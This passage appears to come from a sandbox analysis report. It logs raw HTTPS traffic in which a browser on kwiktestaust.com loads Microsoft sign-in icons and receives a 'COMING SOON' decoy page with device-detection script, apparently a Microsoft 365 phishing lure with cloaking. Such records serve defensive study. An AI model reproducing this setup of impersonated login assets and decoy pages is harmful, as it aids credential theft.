                                                                2024-11-07 20:40:06 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                                Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.164973013.107.246.444436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:05 UTC654OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                Host: aadcdn.msauth.net
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:06 UTC779INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:06 GMT
                                                                Content-Type: image/svg+xml
                                                                Content-Length: 1435
                                                                Connection: close
                                                                Cache-Control: public, max-age=31536000
                                                                Content-Encoding: gzip
                                                                Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                ETag: 0x8DB5C3F4911527F
                                                                x-ms-request-id: 79728d2d-301e-0063-66d3-2c6100000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                Access-Control-Allow-Origin: *
                                                                x-azure-ref: 20241107T204006Z-16547b76f7frbg6bhC1DFWr54000000008e000000000zszu
                                                                x-fd-int-roxy-purgeid: 0
                                                                X-Cache: TCP_HIT
                                                                Accept-Ranges: bytes
                                                                2024-11-07 20:40:06 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.164973113.107.246.444436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:05 UTC657OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                                Host: aadcdn.msauth.net
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:06 UTC805INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:06 GMT
                                                                Content-Type: image/svg+xml
                                                                Content-Length: 199
                                                                Connection: close
                                                                Cache-Control: public, max-age=31536000
                                                                Content-Encoding: gzip
                                                                Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                ETag: 0x8DB5C3F49C21D98
                                                                x-ms-request-id: ddcda72d-501e-002b-070b-2f439a000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                Access-Control-Allow-Origin: *
                                                                x-azure-ref: 20241107T204006Z-17df447cdb54qlp6hC1DFWqcfc00000004z00000000015zc
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                X-Cache: TCP_HIT
                                                                X-Cache-Info: L1_T2
                                                                Accept-Ranges: bytes
                                                                2024-11-07 20:40:06 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                                Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.1649723184.28.90.27443
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:06 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                Range: bytes=0-2147483646
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: fs.microsoft.com
                                                                2024-11-07 20:40:06 UTC514INHTTP/1.1 200 OK
                                                                ApiVersion: Distribute 1.1
                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                Content-Type: application/octet-stream
                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                Server: ECAcc (lpl/EF06)
                                                                X-CID: 11
                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                X-Ms-Region: prod-weu-z1
                                                                Cache-Control: public, max-age=37475
                                                                Date: Thu, 07 Nov 2024 20:40:06 GMT
                                                                Content-Length: 55
                                                                Connection: close
                                                                X-CID: 2
                                                                2024-11-07 20:40:06 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.1649725192.229.133.2214436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:06 UTC545OUTGET /w3css/4/w3.css HTTP/1.1
                                                                Host: www.w3schools.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: text/css,*/*;q=0.1
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: style
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:06 UTC581INHTTP/1.1 200 OK
                                                                Age: 550787
                                                                Cache-Control: public,max-age=31536000,public
                                                                Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                                Content-Type: text/css
                                                                Date: Thu, 07 Nov 2024 20:40:06 GMT
                                                                Etag: "0a5fddf412cdb1:0+gzip+ident"
                                                                Last-Modified: Fri, 01 Nov 2024 09:38:58 GMT
                                                                Server: ECS (lhd/35B3)
                                                                Vary: Accept-Encoding
                                                                X-Cache: HIT
                                                                X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                                X-Powered-By: ASP.NET
                                                                Content-Length: 23427
                                                                Connection: close
                                                                2024-11-07 20:40:06 UTC16383INData Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62
                                                                Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
                                                                2024-11-07 20:40:06 UTC7044INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23
                                                                Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.1649727152.199.21.1754436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:06 UTC660OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                                Host: aadcdn.msftauth.net
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:06 UTC738INHTTP/1.1 200 OK
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                Age: 19667178
                                                                Cache-Control: public, max-age=31536000
                                                                Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                                Content-Type: image/svg+xml
                                                                Date: Thu, 07 Nov 2024 20:40:06 GMT
                                                                Etag: 0x8DB5C3F4AC59B47
                                                                Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                                Server: ECAcc (lhc/78BB)
                                                                Vary: Accept-Encoding
                                                                X-Cache: HIT
                                                                x-ms-blob-type: BlockBlob
                                                                x-ms-lease-status: unlocked
                                                                x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                                x-ms-version: 2009-09-19
                                                                Content-Length: 1636
                                                                Connection: close
                                                                2024-11-07 20:40:06 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.1649735188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:06 UTC667OUTGET /favicon.ico HTTP/1.1
                                                                Host: kwiktestaust.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://kwiktestaust.com/o/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9WlZrMWQwcz0mdWlkPVVTRVIyMTEwMjAyNFU1MjEwMjExNw==
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:07 UTC857INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:07 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
                                                                Vary: Accept-Encoding
                                                                Cache-Control: max-age=14400
                                                                CF-Cache-Status: REVALIDATED
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h4SEBpXoxVZFmLsTg6S3E%2BRPXVg6ZjzTfmcTDmeGGFrog5qfparfy6OfuR%2B%2B%2BhC7Eyjxn6cZoDpHB8lFwiUMECg1GY8GoRWKiBrW3N%2Fy3Rs4%2BVIDacOCElGKm%2B7cEFGQ37al"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df022f169c16b4b-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1245&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1245&delivery_rate=1652025&cwnd=251&unsent_bytes=0&cid=5bc02f43c223662e&ts=574&x=0"
                                                                2024-11-07 20:40:07 UTC512INData Raw: 31 30 38 35 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 4f 4d 49 4e 47 20 53 4f 4f 4e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 67 69 6d 67 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 43 4f 4d 49 4e 47 20 53 4f 4f 4e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 68 72 3e 0a 20 20 20 20 20 20 20 20 3c 70 20 69 64 3d 22 64 65 6d 6f 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 22 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 62 6f 64 79 2c 0a 20 20 20
                                                                Data Ascii: 1085<html> <head> <title>COMING SOON</title> <body> <div class="bgimg"> <div class="middle"> <h1>COMING SOON</h1> <hr> <p id="demo" style="font-size:30px"></p> </div> </div> <style> body,
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 65 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 20 43 6f 75 72 69 65 72 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 74 6f 70 6c 65 66 74 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 62 6f 74 74 6f 6d 6c 65 66 74 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20
                                                                Data Ascii: e; color: white; font-family: "Courier New", Courier, monospace; font-size: 25px; } .topleft { position: absolute; top: 0; left: 16px; } .bottomleft { position: absolute;
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 20 20 20 20 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 09 09 77 69 6e 64 6f 77 2e 6d 6f 62 69 6c 65 43 68 65 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 09 20 20 6c 65 74 20 63 68 65 63 6b 20 3d 20 66 61 6c 73 65 3b 0a 09 09 20 20 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 2f 28 61 6e 64 72 6f 69 64 7c 62 62 5c 64 2b 7c 6d 65 65 67 6f 29 2e 2b 6d 6f 62 69 6c 65 7c 61 76 61 6e 74 67 6f 7c 62 61 64 61 5c 2f 7c 62 6c 61 63 6b 62 65 72 72 79 7c 62 6c 61 7a 65 72 7c 63 6f 6d 70 61 6c 7c 65 6c 61 69 6e 65 7c 66 65 6e 6e 65 63 7c 68 69 70 74 6f 70 7c 69 65 6d 6f 62 69 6c 65 7c 69 70 28 68 6f 6e 65 7c 6f 64 29 7c 69 72 69 73 7c 6b 69 6e 64 6c 65 7c 6c 67 65 20 7c 6d 61 65 6d 6f 7c 6d 69 64 70 7c 6d 6d 70 7c 6d 6f 62 69 6c 65 2e 2b 66 69 72 65 66 6f
                                                                Data Ascii: }, 1000);window.mobileCheck = function() { let check = false; (function(a){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefo
                                                                2024-11-07 20:40:07 UTC987INData Raw: 7c 6e 6f 6b 28 36 7c 69 29 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c 63 29 29 7c 70 68 69 6c 7c 70 69 72 65 7c 70 6c 28 61 79 7c 75 63 29 7c 70 6e 5c 2d 32 7c 70 6f 28 63 6b 7c 72 74 7c 73 65 29 7c 70 72 6f 78 7c 70 73 69 6f 7c 70 74 5c 2d 67 7c 71 61 5c 2d 61 7c 71 63 28 30 37 7c 31 32 7c 32 31 7c 33 32 7c 36 30 7c 5c 2d 5b 32 2d 37 5d 7c 69 5c 2d 29 7c 71 74 65 6b 7c 72 33 38 30 7c 72 36 30 30 7c 72 61 6b 73 7c 72 69 6d 39 7c 72 6f 28 76 65 7c 7a 6f 29 7c 73 35 35 5c 2f 7c 73 61 28 67 65 7c 6d 61 7c 6d 6d 7c 6d 73 7c 6e 79 7c 76 61 29 7c 73 63 28 30 31 7c 68 5c 2d 7c 6f 6f 7c 70 5c 2d 29 7c 73 64
                                                                Data Ascii: |nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sd
                                                                2024-11-07 20:40:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.1649736188.114.97.34436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:06 UTC395OUTGET /o/jsv.js HTTP/1.1
                                                                Host: kwiktestaust.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: _cid=05688cc8bbdbb0122f88552d85978beb
                                                                2024-11-07 20:40:06 UTC865INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:06 GMT
                                                                Content-Type: application/javascript
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Last-Modified: Wed, 30 Oct 2024 15:36:02 GMT
                                                                Vary: Accept-Encoding
                                                                Cache-Control: max-age=14400
                                                                CF-Cache-Status: HIT
                                                                Age: 2
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qY8q7j91na3whjvDexZJaJQBibr5%2FSIiRuRvfNO%2BP17BjIKHTQAHjLNeiPulyCm5aET%2BC7i4boG9Jd6YKuzjiLJir9aElauaVQ%2BL0ceY7KFoUD%2BdGEMm0wGNbCHRl9atySJC"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8df022f199d60bac-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=973&delivery_rate=1993117&cwnd=251&unsent_bytes=0&cid=086e4dcfaf4ea001&ts=154&x=0"
